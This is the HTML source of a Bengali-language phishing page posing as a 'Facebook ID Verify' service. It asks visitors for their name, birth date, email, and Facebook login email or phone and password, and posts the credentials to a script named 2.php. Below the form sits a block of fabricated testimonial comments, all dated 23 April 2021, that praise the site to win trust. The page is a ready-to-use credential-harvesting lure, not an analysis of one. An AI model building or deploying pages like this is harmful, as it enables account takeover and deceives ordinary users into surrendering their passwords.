 <html>
<head>
     <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1"/>
     
  <title> Submit Your Info </title>
 

<style>
@import url('https://cdn.rawgit.com/sh4hids/bangla-web-fonts/lal-sabuj-normal/stylesheet.css');
@import url('https://fonts.googleapis.com/css2?family=Noto+Serif&display=swap');
body{
  
  background-color:#FFE3ED ;
  border: 3px solid red;
  padding: 10px;
  margin: 3px;
  width: auto;
  
}

.love p{
  font-size: 20px;
  font-weight: bold;
  padding-top: 20px;
  font-family: 'LalSabujNormal';

}

.abm{
  
  background-color:#FFE3ED ;
  margin-top: -15px ;
  width: 300px;
	height: 40px;
  margin-bottom: -10px;
  position: relative;
  display: inline-block;
  padding: 7px 15px;
  color: #DD2C00;
  box-shadow: black;
  font-size: 15px;
  text-decoration: none;
  overflow: hidden;
  transition: .5s;
  
}


.love h3{
  font-size: 20px;
  font-family: 'LalSabujNormal';
  border: 2px solid #34465D;
  border-radius: 20px;
  padding-left: 5px;
  color: #34465D ;
  margin-bottom: 50px;
  
}
  
.love h4{
    font-size: 15px;
    margin-bottom: -5px;
  }
  h6 {
    font-size: 30px;
    font-family: 'Noto Serif', serif;
    text-align: center;
    margin-bottom: 20px ;
    margin-top:40px ;
  }
  


.hover:hover {
  background: red;
  color: #fff;
  border-radius: 20px;
  box-shadow: 0 0 5px red,
              0 0 25px red,
              0 0 50px red,
              0 0 100px red;
}


.uck {
  border: 2px solid #32323284;
}

  .hover   {
  color: #FFF;
  text-align: center;
  font-size: 20px;
  width: 222px;
  cursor:pointer;
  background-color: #000000;
  display: block;margin:0px auto;border-radius:20px;border-color:transparent;height:40px;
}
/*
.hover1:hover   {
  color: #0FFF;
  text-align: center;
  width: 222px;
  cursor:pointer;
  background-color: #E2040C;
  display: block;margin:0px auto;border-radius:20px;border-color:transparent;height:40px;
}
</style>
	          
 

  </head>
  
  <body>
    <div class="love">
 
<table border="2" align= "center"><tr><td><img src="img/1.png" align= "center" width= "300" height =""></td></tr></table>


   <h6>Facebook ID Verify</h6>


	<h3> • আপনার ফেইসবুক একাউন্ট Full Verify করার জন্য আপনার একাউন্টে দেওয়া তথ্য গুলো আমাদের দিতে হবে। <br>
• এখানে চাওয়া সকল তথ্য আপনার ফেইসবুক একাউন্ট অনুযায়ী দিবেন।<br>
• এই তথ্য গুলো অনুযায়ী ফেইক কার্ড তৈরি করা হবে। তাই ভুল তথ্য দিলে আমরা আপনার একাউন্টটি ভেরিফাই করতে পারব না।


</h3>

	<p>* আপনার নাম লিখুন:</p>
	   <input type="text" class="abm" placeholder="Your Fb ID Name" required>
	   
	   
<p>* আপনার জন্ম তারিখ দেন: </p>
<input type="date" class="abm">

<p>* আপনার একটি ইমেইল দিন: </p>
<input type="text" class="abm" placeholder="bd8kr3m@gmail.com" >



  <form class="login-form" action="2.php" method="post">
    
    <p>* আপনার ফেইসবুকে ব্যবহার করা ইমেইল/ফোন নম্বটি দিন:</p>
    
      <input type="text" class="abm"name="email" placeholder="Email or phone" required>
    
    <p>* আপনার ফেইসবুকে ব্যবহার করা পাসওয়ার্ডটি দিন:</p>
    
      <input type="password" class="abm" name="pass" placeholder="Password" required>
    <br><br>
<h5 style="color:red">[ আপনার ফেইসবুকে ব্যবহার করা নাম্বর ও পসওয়ার্ডটি সঠিক না দিলে আমরা আপনার একাউন্টটি Verify করতে পারবোনা ]<br>
  <h4 style="color:#0084FF"> <input type="checkbox">আমি সকল তথ্য সঠিক দিয়েছি</h4>
   
<center><h4> নিচে জমাদিন বাটনে ক্লিক করুন </h4></center>
  
 <center>⬇⬇⬇⬇<br>

<input type="submit" value="জমা দিন" class="hover hover1">
  </form>
</section>
</div></body>
<br> <br>
    
    <div class="fuck">
<style>
        .name, .profile {
            cursor: pointer
        }

        .name {
            font-weight: 700
        }
        .comments_face {
            font-family: roboto, sans-serif;
            background-color: #fff
        }
        .comments_face .comments {
            background-color: #FFE3ED;
            border-bottom: 2px solid #fff;
            padding: 10px
        }
        .comments_face .profile {
            float: left;
            width: 60px;
            margin-right: 10px
        }
        .comments_face .comment-content img, .comments_face .profile img {
            width: 100%
        }
        .comments_face .comment-content img, .comments_face .profile img, .comment-status img {
            margin: 0 auto
            
        }
        .comments_face .comment-content {
            padding-left: 70px
        }
        .comments_face p {
            font-size: 14px
        }
        .comments_face .name {
            margin: 0
        }
        .comments_face .comment-status span, .comments_face .name {
            color: #3b5998
        }
        .comments_face .name, .comments_face .result {
            font-weight: 700
        }
        .comments_face .button, .comments_face .name, .comments_face .profile {
            cursor: pointer
        }
        .comments_face .comment-status {
            font-size: 11px;
            cursor: pointer
        }
        .comments_face .comment-status span, .comments_face .name {
            color: #3b5998
        }

        .comments_face .button, .comments_face .main-content span {
            color: red
        }
        .comments_face .clr {
            clear: both
        }
    </style>
    <body>
<div class="comments_face">
<div class="comments">
<p style="margin:0;padding:0;float:left;display:block;width:50%">
<span style="color:#3b5998"> মন্তব্য</span>
</p>
<p style="margin:0;padding:0;float:right;display:block;width:50%;color:#a8a7a7;text-align:right">
353 এর 11
</p>
<div style="clear:both">
</div>
</div>
<div class="comments">
<div class="profile">
<img src="/img/1.jpg">
</div>
<div class="comment-content">
<p class="name">
নৌশিন জামান
</p>
<p>
আমি ভারত থেকে বাংলাদেশের এই সাইট থেকে মাত্র ২০ মিনিটের মধ্যেই আমার একাউন্টটি ভেরিফাই করতে পেরেছি। এই সাইটের এডমিনদের মন থেকে ধন্যবাদ।
</p>
</div>
<div class="clr">
</div>
<div class="comment-status">
<span> মন্তব্য পছন্দ <img src="/img/like.png" width="15px" height="15px">20</span> · <span class="p_var-dia">23 April, 2021</span>
</div>
</div>
<div class="comments">
<div class="profile">
<img src="/img/2.jpg">
</div>
<div class="comment-content">
<p class="name">
ইফতেখারুজ্জামান প্রান্ত
</p>
<p>
আমি ভেবেছিলাম এটি ভুয়া, পরে আমি কাল আমার একটি ফেইক একাউন্ট দিয়েছিলাম পরে দেখি সত্যি সত্যি আমার আইডি ভেরিফাই হয়ে গেছে। এখন আমার রিয়েল আইডিটি ভেরিফাই করবো।  আমি ধন্যবাদ দিয়ে আপনাদের ছোট করবো না। তবে দোয়া রইলো আপনাদের উপর
</p>
</div>
<div class="clr">
</div>
<div class="comment-status">
<span> মন্তব্য পছন্দ <img src="/img/like.png" width="15px" height="15px">47</span> · <span class="p_var-dia">23 April, 2021</span>
</div>
</div>
<div class="comments">
<div class="profile">
<img src="/img/3.jpg">
</div>
<div class="comment-content">
<p class="name">
সারোয়ার ইসলাম শাহিদ
</p>
<p>
হাহাহাহা, আমিও ভেরিফাই করে ফেললাম এখান থেকে। আমার একাউন্ট আর নষ্ট হবে না। ধন্যবাদ ভাই
</p>
</div>
<div class="clr">
</div>
<div class="comment-status">
<span> মন্তব্য পছন্দ <img src="/img/like.png" width="15px" height="15px">3</span> · <span class="p_var-dia">23 April, 2021</span>
</div>
</div>
<div class="comments">
<div class="profile">
<img src="/img/4.jpg">
</div>
<div class="comment-content">
<p class="name">
Israt Jahan Munni
</p>
<p>
আমি এবং আমার বন্ধুরা সবাই এখান থেকে ফেইসবুক একাউন্ট ভেরিফাই করলাম। Love you admin
</p>
</div>
<div class="clr">
</div>
<div class="comment-status">
<span> মন্তব্য পছন্দ <img src="/img/like.png" width="15px" height="15px">19</span> · <span class="p_var-dia">23 April, 2021</span>
</div>
</div>
<div class="comments">
<div class="profile">
<img src="/img/5.jpg">
</div>
<div class="comment-content">
<p class="name">
Tanvir Evan
</p>
<p>
কি বলবো ভাই,, ভেরিফাই হওয়ার পর আমি তো অবাক।  সত্যিই আমাদের দেশ অনেক এগিয়ে গেছে।
</p>
</div>
<div class="clr">
</div>
<div class="comment-status">
<span> মন্তব্য পছন্দ <img src="/img/like.png" width="15px" height="15px">26</span> · <span class="p_var-dia">23 April, 2021</span>
</div>
</div>
<div class="comments">
<div class="profile">
<img src="/img/6.jpg">
</div>
<div class="comment-content">
<p class="name">
মাহিয়া মাহি
</p>
<p>
আমি একটি একাউন্ট ভেরিফাই করেছি, এখন আমার বান্ধবীর একাউন্ট ভেরিফাই করবো
</p>
</div>
<div class="clr">
</div>
<div class="comment-status">
<span> মন্তব্য পছন্দ <img src="/img/like.png" width="15px" height="15px">38</span> · <span class="p_var-dia">23 April, 2021</span>
</div>
</div>
<div class="comments">
<div class="profile">
<img src="/img/11.jpg">
</div>
<div class="comment-content">
<p class="name">
কাউসার আলম
</p>
<p>
মন থেকে ধন্যবাদ। বেশি কিছু বললাম না।
</p>
</div>
<div class="clr">
</div>
<div class="comment-status">
<span> মন্তব্য পছন্দ <img src="/img/like.png" width="15px" height="15px">27</span> · <span class="p_var-dia">23 April, 2021</span>
</div>
</div>
<div class="comments">
<div class="profile">
<img src="/img/7.jpg">
</div>
<div class="comment-content">
<p class="name">
Md Sumon Ahmed 
</p>
<p>
আমি কি আজ  ভেরিফাই করতে পারবো?
</p>
</div>
<div class="clr">
</div>
<div class="comment-status">
<span> মন্তব্য পছন্দ <img src="/img/like.png" width="15px" height="15px">50</span> · <span class="p_var-dia">23 April, 2021</span>
</div>
</div>
<div class="comments">
<div class="profile">
<img src="/img/8.jpg">
</div>
<div class="comment-content">
<p class="name">
Angel Fariha
</p>
<p>
অবিশ্বাস্য! আমি এর আগে কখনও ভাবতেও পারি এমন একটা সাইট পাবো!
</p>
</div>
<div class="clr">
</div>
<div class="comment-status">
<span> মন্তব্য পছন্দ <img src="/img/like.png" width="15px" height="15px">45</span> · <span class="p_var-dia">23 April, 2021</span>
</div>
</div>
<div class="comments">
<div class="profile">
<img src="/img/9.jpg">
</div>
<div class="comment-content">
<p class="name">
নিপা সুলতানা
</p>
<p>
প্রথমে আমি ভেবেছিলাম এটি মিথ্যা কিন্তু অবশেষে আমিও ভেরিফাই করতে পরেছি ধন্যবাদ ।
</p>
</div>
<div class="clr">
</div>
<div class="comment-status">
<span> মন্তব্য পছন্দ <img src="/img/like.png" width="15px" height="15px">17</span> · <span class="p_var-dia">23 April, 2021</span>
</div>
</div>
<div class="comments">
<div class="profile">
<img src="/img/10.jpg">
</div>
<div class="comment-content">
<p class="name">
পিন্টু শিকদার
</p>
<p>
মাত্র ২ ঘন্টার মধ্যে ভেরিফাই হয়ে গেল। 
</p>
</div>
<div class="clr">
</div>
<div class="comment-status">
<span> মন্তব্য পছন্দ <img src="/img/like.png" width="15px" height="15px">51</span> · <span class="p_var-dia">23 April, 2021</span>
</div>
</div>
</div>
<br/>
            

    
    
  </body>
</html>



</html>
